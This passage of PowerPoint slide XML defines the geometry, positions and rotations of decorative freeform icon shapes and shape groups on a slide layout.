                <a:gd name="T10" fmla="*/ 445 w 473"/>
                <a:gd name="T11" fmla="*/ 0 h 465"/>
                <a:gd name="T12" fmla="*/ 0 w 473"/>
                <a:gd name="T13" fmla="*/ 81 h 465"/>
                <a:gd name="T14" fmla="*/ 85 w 473"/>
                <a:gd name="T15" fmla="*/ 166 h 465"/>
                <a:gd name="T16" fmla="*/ 464 w 473"/>
                <a:gd name="T17" fmla="*/ 98 h 465"/>
                <a:gd name="T18" fmla="*/ 414 w 473"/>
                <a:gd name="T19" fmla="*/ 24 h 465"/>
                <a:gd name="T20" fmla="*/ 440 w 473"/>
                <a:gd name="T21" fmla="*/ 67 h 465"/>
                <a:gd name="T22" fmla="*/ 443 w 473"/>
                <a:gd name="T23" fmla="*/ 83 h 465"/>
                <a:gd name="T24" fmla="*/ 388 w 473"/>
                <a:gd name="T25" fmla="*/ 93 h 465"/>
                <a:gd name="T26" fmla="*/ 355 w 473"/>
                <a:gd name="T27" fmla="*/ 36 h 465"/>
                <a:gd name="T28" fmla="*/ 414 w 473"/>
                <a:gd name="T29" fmla="*/ 24 h 465"/>
                <a:gd name="T30" fmla="*/ 291 w 473"/>
                <a:gd name="T31" fmla="*/ 45 h 465"/>
                <a:gd name="T32" fmla="*/ 324 w 473"/>
                <a:gd name="T33" fmla="*/ 105 h 465"/>
                <a:gd name="T34" fmla="*/ 265 w 473"/>
                <a:gd name="T35" fmla="*/ 117 h 465"/>
                <a:gd name="T36" fmla="*/ 232 w 473"/>
                <a:gd name="T37" fmla="*/ 57 h 465"/>
                <a:gd name="T38" fmla="*/ 291 w 473"/>
                <a:gd name="T39" fmla="*/ 45 h 465"/>
                <a:gd name="T40" fmla="*/ 171 w 473"/>
                <a:gd name="T41" fmla="*/ 69 h 465"/>
                <a:gd name="T42" fmla="*/ 204 w 473"/>
                <a:gd name="T43" fmla="*/ 126 h 465"/>
                <a:gd name="T44" fmla="*/ 144 w 473"/>
                <a:gd name="T45" fmla="*/ 138 h 465"/>
                <a:gd name="T46" fmla="*/ 109 w 473"/>
                <a:gd name="T47" fmla="*/ 79 h 465"/>
                <a:gd name="T48" fmla="*/ 171 w 473"/>
                <a:gd name="T49" fmla="*/ 69 h 465"/>
                <a:gd name="T50" fmla="*/ 97 w 473"/>
                <a:gd name="T51" fmla="*/ 181 h 465"/>
                <a:gd name="T52" fmla="*/ 10 w 473"/>
                <a:gd name="T53" fmla="*/ 268 h 465"/>
                <a:gd name="T54" fmla="*/ 10 w 473"/>
                <a:gd name="T55" fmla="*/ 465 h 465"/>
                <a:gd name="T56" fmla="*/ 473 w 473"/>
                <a:gd name="T57" fmla="*/ 465 h 465"/>
                <a:gd name="T58" fmla="*/ 473 w 473"/>
                <a:gd name="T59" fmla="*/ 181 h 465"/>
                <a:gd name="T60" fmla="*/ 97 w 473"/>
                <a:gd name="T61" fmla="*/ 181 h 465"/>
                <a:gd name="T62" fmla="*/ 376 w 473"/>
                <a:gd name="T63" fmla="*/ 370 h 465"/>
                <a:gd name="T64" fmla="*/ 111 w 473"/>
                <a:gd name="T65" fmla="*/ 370 h 465"/>
                <a:gd name="T66" fmla="*/ 111 w 473"/>
                <a:gd name="T67" fmla="*/ 342 h 465"/>
                <a:gd name="T68" fmla="*/ 376 w 473"/>
                <a:gd name="T69" fmla="*/ 342 h 465"/>
                <a:gd name="T70" fmla="*/ 376 w 473"/>
                <a:gd name="T71" fmla="*/ 370 h 465"/>
                <a:gd name="T72" fmla="*/ 376 w 473"/>
                <a:gd name="T73" fmla="*/ 304 h 465"/>
                <a:gd name="T74" fmla="*/ 111 w 473"/>
                <a:gd name="T75" fmla="*/ 304 h 465"/>
                <a:gd name="T76" fmla="*/ 111 w 473"/>
                <a:gd name="T77" fmla="*/ 275 h 465"/>
                <a:gd name="T78" fmla="*/ 376 w 473"/>
                <a:gd name="T79" fmla="*/ 275 h 465"/>
                <a:gd name="T80" fmla="*/ 376 w 473"/>
                <a:gd name="T81" fmla="*/ 30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3" h="465">
                  <a:moveTo>
                    <a:pt x="69" y="181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="181"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="464" y="98"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="445" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464" y="98"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="414" y="24"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="440" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414" y="24"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="291" y="45"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="324" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265" y="117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291" y="45"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="171" y="69"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="204" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="69"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97" y="181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10" y="268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="181"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="376" y="370"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111" y="370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376" y="342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376" y="370"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="376" y="304"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376" y="3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112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4CEB013-33A7-4FE2-AB9F-19C417ABD8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80850">
              <a:off x="4904703" y="4249179"/>
              <a:ext cx="750888" cy="74771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113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6946FC41-852E-453C-B81E-0270D2E313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65638" y="997812"/>
              <a:ext cx="601663" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 143 w 160"/>
                <a:gd name="T1" fmla="*/ 0 h 200"/>
                <a:gd name="T2" fmla="*/ 16 w 160"/>
                <a:gd name="T3" fmla="*/ 0 h 200"/>
                <a:gd name="T4" fmla="*/ 0 w 160"/>
                <a:gd name="T5" fmla="*/ 17 h 200"/>
                <a:gd name="T6" fmla="*/ 0 w 160"/>
                <a:gd name="T7" fmla="*/ 183 h 200"/>
                <a:gd name="T8" fmla="*/ 16 w 160"/>
                <a:gd name="T9" fmla="*/ 200 h 200"/>
                <a:gd name="T10" fmla="*/ 143 w 160"/>
                <a:gd name="T11" fmla="*/ 200 h 200"/>
                <a:gd name="T12" fmla="*/ 160 w 160"/>
                <a:gd name="T13" fmla="*/ 183 h 200"/>
                <a:gd name="T14" fmla="*/ 160 w 160"/>
                <a:gd name="T15" fmla="*/ 17 h 200"/>
                <a:gd name="T16" fmla="*/ 143 w 160"/>
                <a:gd name="T17" fmla="*/ 0 h 200"/>
                <a:gd name="T18" fmla="*/ 78 w 160"/>
                <a:gd name="T19" fmla="*/ 193 h 200"/>
                <a:gd name="T20" fmla="*/ 68 w 160"/>
                <a:gd name="T21" fmla="*/ 183 h 200"/>
                <a:gd name="T22" fmla="*/ 78 w 160"/>
                <a:gd name="T23" fmla="*/ 173 h 200"/>
                <a:gd name="T24" fmla="*/ 88 w 160"/>
                <a:gd name="T25" fmla="*/ 183 h 200"/>
                <a:gd name="T26" fmla="*/ 78 w 160"/>
                <a:gd name="T27" fmla="*/ 193 h 200"/>
                <a:gd name="T28" fmla="*/ 148 w 160"/>
                <a:gd name="T29" fmla="*/ 164 h 200"/>
                <a:gd name="T30" fmla="*/ 12 w 160"/>
                <a:gd name="T31" fmla="*/ 164 h 200"/>
                <a:gd name="T32" fmla="*/ 12 w 160"/>
                <a:gd name="T33" fmla="*/ 12 h 200"/>
                <a:gd name="T34" fmla="*/ 148 w 160"/>
                <a:gd name="T35" fmla="*/ 12 h 200"/>
                <a:gd name="T36" fmla="*/ 148 w 160"/>
                <a:gd name="T37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00">
                  <a:moveTo>
                    <a:pt x="1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52" y="200"/>
                    <a:pt x="160" y="192"/>
                    <a:pt x="160" y="183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7"/>
                    <a:pt x="152" y="0"/>
                    <a:pt x="143" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="78" y="193"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="193"/>
                    <a:pt x="68" y="188"/>
                    <a:pt x="68" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="177"/>
                    <a:pt x="73" y="173"/>
                    <a:pt x="78" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="173"/>
                    <a:pt x="88" y="177"/>
                    <a:pt x="88" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="188"/>
                    <a:pt x="84" y="193"/>
                    <a:pt x="78" y="193"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="148" y="164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8" y="12"/>
                    <a:pt x="148" y="12"/>
                    <a:pt x="148" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14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114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF3C8AFE-B54C-4491-A72F-9C52BE5407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669559">
              <a:off x="2266840" y="3095065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7B0C14A8-FF87-47CE-9AE3-E832EB68E5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36245">
              <a:off x="6966888" y="4093733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528C31E5-CAD4-4CF3-8AE6-8D64EA3D92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463989">
              <a:off x="10195748" y="1653787"/>
              <a:ext cx="511175" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 80 w 136"/>
                <a:gd name="T1" fmla="*/ 38 h 200"/>
                <a:gd name="T2" fmla="*/ 80 w 136"/>
                <a:gd name="T3" fmla="*/ 57 h 200"/>
                <a:gd name="T4" fmla="*/ 69 w 136"/>
                <a:gd name="T5" fmla="*/ 69 h 200"/>
                <a:gd name="T6" fmla="*/ 56 w 136"/>
                <a:gd name="T7" fmla="*/ 57 h 200"/>
                <a:gd name="T8" fmla="*/ 56 w 136"/>
                <a:gd name="T9" fmla="*/ 38 h 200"/>
                <a:gd name="T10" fmla="*/ 69 w 136"/>
                <a:gd name="T11" fmla="*/ 25 h 200"/>
                <a:gd name="T12" fmla="*/ 80 w 136"/>
                <a:gd name="T13" fmla="*/ 38 h 200"/>
                <a:gd name="T14" fmla="*/ 94 w 136"/>
                <a:gd name="T15" fmla="*/ 200 h 200"/>
                <a:gd name="T16" fmla="*/ 44 w 136"/>
                <a:gd name="T17" fmla="*/ 200 h 200"/>
                <a:gd name="T18" fmla="*/ 0 w 136"/>
                <a:gd name="T19" fmla="*/ 157 h 200"/>
                <a:gd name="T20" fmla="*/ 0 w 136"/>
                <a:gd name="T21" fmla="*/ 44 h 200"/>
                <a:gd name="T22" fmla="*/ 44 w 136"/>
                <a:gd name="T23" fmla="*/ 0 h 200"/>
                <a:gd name="T24" fmla="*/ 60 w 136"/>
                <a:gd name="T25" fmla="*/ 0 h 200"/>
                <a:gd name="T26" fmla="*/ 60 w 136"/>
                <a:gd name="T27" fmla="*/ 20 h 200"/>
                <a:gd name="T28" fmla="*/ 48 w 136"/>
                <a:gd name="T29" fmla="*/ 38 h 200"/>
                <a:gd name="T30" fmla="*/ 48 w 136"/>
                <a:gd name="T31" fmla="*/ 57 h 200"/>
                <a:gd name="T32" fmla="*/ 60 w 136"/>
                <a:gd name="T33" fmla="*/ 74 h 200"/>
                <a:gd name="T34" fmla="*/ 60 w 136"/>
                <a:gd name="T35" fmla="*/ 88 h 200"/>
                <a:gd name="T36" fmla="*/ 76 w 136"/>
                <a:gd name="T37" fmla="*/ 88 h 200"/>
                <a:gd name="T38" fmla="*/ 76 w 136"/>
                <a:gd name="T39" fmla="*/ 74 h 200"/>
                <a:gd name="T40" fmla="*/ 88 w 136"/>
                <a:gd name="T41" fmla="*/ 57 h 200"/>
                <a:gd name="T42" fmla="*/ 88 w 136"/>
                <a:gd name="T43" fmla="*/ 38 h 200"/>
                <a:gd name="T44" fmla="*/ 76 w 136"/>
                <a:gd name="T45" fmla="*/ 20 h 200"/>
                <a:gd name="T46" fmla="*/ 76 w 136"/>
                <a:gd name="T47" fmla="*/ 0 h 200"/>
                <a:gd name="T48" fmla="*/ 94 w 136"/>
                <a:gd name="T49" fmla="*/ 0 h 200"/>
                <a:gd name="T50" fmla="*/ 136 w 136"/>
                <a:gd name="T51" fmla="*/ 44 h 200"/>
                <a:gd name="T52" fmla="*/ 136 w 136"/>
                <a:gd name="T53" fmla="*/ 157 h 200"/>
                <a:gd name="T54" fmla="*/ 94 w 136"/>
                <a:gd name="T5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6" h="200">
                  <a:moveTo>
                    <a:pt x="80" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="57"/>
                    <a:pt x="80" y="57"/>
                    <a:pt x="80" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="64"/>
                    <a:pt x="76" y="69"/>
                    <a:pt x="69" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="69"/>
                    <a:pt x="56" y="64"/>
                    <a:pt x="56" y="57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1"/>
                    <a:pt x="62" y="25"/>
                    <a:pt x="69" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="25"/>
                    <a:pt x="80" y="31"/>
                    <a:pt x="80" y="38"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="94" y="200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="200"/>
                    <a:pt x="44" y="200"/>
                    <a:pt x="44" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="200"/>
                    <a:pt x="0" y="181"/>
                    <a:pt x="0" y="15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3" y="23"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="48" y="3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65"/>
                    <a:pt x="53" y="72"/>
                    <a:pt x="60" y="74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83" y="72"/>
                    <a:pt x="88" y="65"/>
                    <a:pt x="88" y="57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0"/>
                    <a:pt x="83" y="23"/>
                    <a:pt x="76" y="2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18" y="0"/>
                    <a:pt x="136" y="20"/>
                    <a:pt x="136" y="44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81"/>
                    <a:pt x="118" y="200"/>
                    <a:pt x="94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9973455F-D01E-4F99-ABB7-F6138867ED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968536">
              <a:off x="11364899" y="904585"/>
              <a:ext cx="754483" cy="708323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9" name="Freeform 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10659E1F-5639-4F32-B25D-9701AAD212CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="6110587">
              <a:off x="3914384" y="11279"/>
              <a:ext cx="544512" cy="749300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44918D56-DB1B-4975-9A03-430756EB3A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859567">
              <a:off x="10311362" y="547581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88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31A2D1DC-0180-4613-A5B0-FBB22D9756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080229">
              <a:off x="1723533" y="2626350"/>
              <a:ext cx="593375" cy="567235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82" name="Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A132AB-43BF-484C-BFDA-C41D2C96E2E1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0193509">
              <a:off x="11298631" y="3800225"/>
              <a:ext cx="542757" cy="1014720"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="179" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37BDDE6F-4CED-4A1F-8622-F48A1B7B58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0" name="Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26D284F1-53E7-463E-BE2B-7F0E19FB5159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Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F140FACB-C58B-45D4-A3D8-8D80097DCC52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112827">
              <a:off x="5409433" y="3249254"/>
              <a:ext cx="542757" cy="1014720"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="177" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C966120-AF76-425A-A2DB-9D333107AF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8" name="Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A00DA96-F82C-4CF2-8A99-052A2ADF120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91BCCAC2-D566-4843-A175-36EFEAF1BB11}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="3686359">
              <a:off x="1675391" y="1798715"/>
              <a:ext cx="430997" cy="1230792"/>
              <a:chOff x="9469654" y="2159644"/>
              <a:chExt cx="752475" cy="2148831"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="174" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A654C04F-C171-4F4E-BFDE-04F7ED68312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5" name="Freeform 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB371A2B-F09D-4EF6-9564-5F750E35F7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6" name="任意多边形 169">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8438ECF5-38A0-4B29-BE0C-80EBF2CE4A3F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6697AC0A-AC09-4878-A095-3688DE28BE4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="14625855">
              <a:off x="9103382" y="5494084"/>
              <a:ext cx="428290" cy="1223063"/>
              <a:chOff x="9469654" y="2159644"/>
              <a:chExt cx="752475" cy="2148831"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="171" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EA478D6-4BFA-413F-BE7A-E3AA6A69C5B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2" name="Freeform 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A591A452-7E40-4F13-A787-4D54CCEA547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3" name="任意多边形 166">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18F73738-013B-45D3-AF4B-BF054176A966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6" name="Group 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26FA9637-A7B3-43DA-B1C6-8724C5C600DC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19202932">
              <a:off x="8590908" y="-129566"/>
              <a:ext cx="1185863" cy="1506538"/>
              <a:chOff x="2503" y="1682"/>
              <a:chExt cx="747" cy="949"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="168" name="Oval 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA8A153-C695-44EA-962B-495117A8C9C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594" y="2474"/>
                <a:ext cx="140" cy="14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9" name="Freeform 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FD3F10D-1CF6-46E3-BBA9-4A632C6AB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58" y="2262"/>
                <a:ext cx="379" cy="369"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 46 w 159"/>
                  <a:gd name="T1" fmla="*/ 152 h 155"/>
                  <a:gd name="T2" fmla="*/ 2 w 159"/>
                  <a:gd name="T3" fmla="*/ 107 h 155"/>
                  <a:gd name="T4" fmla="*/ 8 w 159"/>
                  <a:gd name="T5" fmla="*/ 30 h 155"/>
                  <a:gd name="T6" fmla="*/ 30 w 159"/>
                  <a:gd name="T7" fmla="*/ 30 h 155"/>
                  <a:gd name="T8" fmla="*/ 34 w 159"/>
                  <a:gd name="T9" fmla="*/ 89 h 155"/>
                  <a:gd name="T10" fmla="*/ 91 w 159"/>
                  <a:gd name="T11" fmla="*/ 89 h 155"/>
                  <a:gd name="T12" fmla="*/ 83 w 159"/>
                  <a:gd name="T13" fmla="*/ 61 h 155"/>
                  <a:gd name="T14" fmla="*/ 97 w 159"/>
                  <a:gd name="T15" fmla="*/ 26 h 155"/>
                  <a:gd name="T16" fmla="*/ 147 w 159"/>
                  <a:gd name="T17" fmla="*/ 0 h 155"/>
                  <a:gd name="T18" fmla="*/ 159 w 159"/>
                  <a:gd name="T19" fmla="*/ 18 h 155"/>
                  <a:gd name="T20" fmla="*/ 124 w 159"/>
                  <a:gd name="T21" fmla="*/ 53 h 155"/>
                  <a:gd name="T22" fmla="*/ 137 w 159"/>
                  <a:gd name="T23" fmla="*/ 79 h 155"/>
                  <a:gd name="T24" fmla="*/ 141 w 159"/>
                  <a:gd name="T25" fmla="*/ 122 h 155"/>
                  <a:gd name="T26" fmla="*/ 46 w 159"/>
                  <a:gd name="T27" fmla="*/ 15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9" h="155">
                    <a:moveTo>
                      <a:pt x="46" y="152"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="151"/>
                      <a:pt x="0" y="145"/>
                      <a:pt x="2" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="72"/>
                      <a:pt x="8" y="30"/>
                      <a:pt x="8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74" y="39"/>
                      <a:pt x="97" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="13"/>
                      <a:pt x="147" y="0"/>
                      <a:pt x="147" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="18"/>
                      <a:pt x="159" y="18"/>
                      <a:pt x="159" y="18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4" y="53"/>
                      <a:pt x="131" y="65"/>
                      <a:pt x="137" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="91"/>
                      <a:pt x="147" y="104"/>
                      <a:pt x="141" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="155"/>
                      <a:pt x="76" y="153"/>
                      <a:pt x="46" y="1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0" name="Freeform 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A7B26F4-64B3-455D-A3CF-7DDC87F9038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03" y="1682"/>
                <a:ext cx="747" cy="578"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 288 w 313"/>
                  <a:gd name="T1" fmla="*/ 109 h 243"/>
                  <a:gd name="T2" fmla="*/ 264 w 313"/>
                  <a:gd name="T3" fmla="*/ 120 h 243"/>
                  <a:gd name="T4" fmla="*/ 287 w 313"/>
                  <a:gd name="T5" fmla="*/ 47 h 243"/>
                  <a:gd name="T6" fmla="*/ 292 w 313"/>
                  <a:gd name="T7" fmla="*/ 34 h 243"/>
                  <a:gd name="T8" fmla="*/ 5 w 313"/>
                  <a:gd name="T9" fmla="*/ 34 h 243"/>
                  <a:gd name="T10" fmla="*/ 11 w 313"/>
                  <a:gd name="T11" fmla="*/ 46 h 243"/>
                  <a:gd name="T12" fmla="*/ 32 w 313"/>
                  <a:gd name="T13" fmla="*/ 64 h 243"/>
                  <a:gd name="T14" fmla="*/ 12 w 313"/>
                  <a:gd name="T15" fmla="*/ 78 h 243"/>
                  <a:gd name="T16" fmla="*/ 20 w 313"/>
                  <a:gd name="T17" fmla="*/ 164 h 243"/>
                  <a:gd name="T18" fmla="*/ 39 w 313"/>
                  <a:gd name="T19" fmla="*/ 195 h 243"/>
                  <a:gd name="T20" fmla="*/ 46 w 313"/>
                  <a:gd name="T21" fmla="*/ 165 h 243"/>
                  <a:gd name="T22" fmla="*/ 52 w 313"/>
                  <a:gd name="T23" fmla="*/ 195 h 243"/>
                  <a:gd name="T24" fmla="*/ 71 w 313"/>
                  <a:gd name="T25" fmla="*/ 151 h 243"/>
                  <a:gd name="T26" fmla="*/ 43 w 313"/>
                  <a:gd name="T27" fmla="*/ 78 h 243"/>
                  <a:gd name="T28" fmla="*/ 42 w 313"/>
                  <a:gd name="T29" fmla="*/ 67 h 243"/>
                  <a:gd name="T30" fmla="*/ 38 w 313"/>
                  <a:gd name="T31" fmla="*/ 37 h 243"/>
                  <a:gd name="T32" fmla="*/ 154 w 313"/>
                  <a:gd name="T33" fmla="*/ 19 h 243"/>
                  <a:gd name="T34" fmla="*/ 153 w 313"/>
                  <a:gd name="T35" fmla="*/ 170 h 243"/>
                  <a:gd name="T36" fmla="*/ 112 w 313"/>
                  <a:gd name="T37" fmla="*/ 238 h 243"/>
                  <a:gd name="T38" fmla="*/ 116 w 313"/>
                  <a:gd name="T39" fmla="*/ 217 h 243"/>
                  <a:gd name="T40" fmla="*/ 128 w 313"/>
                  <a:gd name="T41" fmla="*/ 216 h 243"/>
                  <a:gd name="T42" fmla="*/ 155 w 313"/>
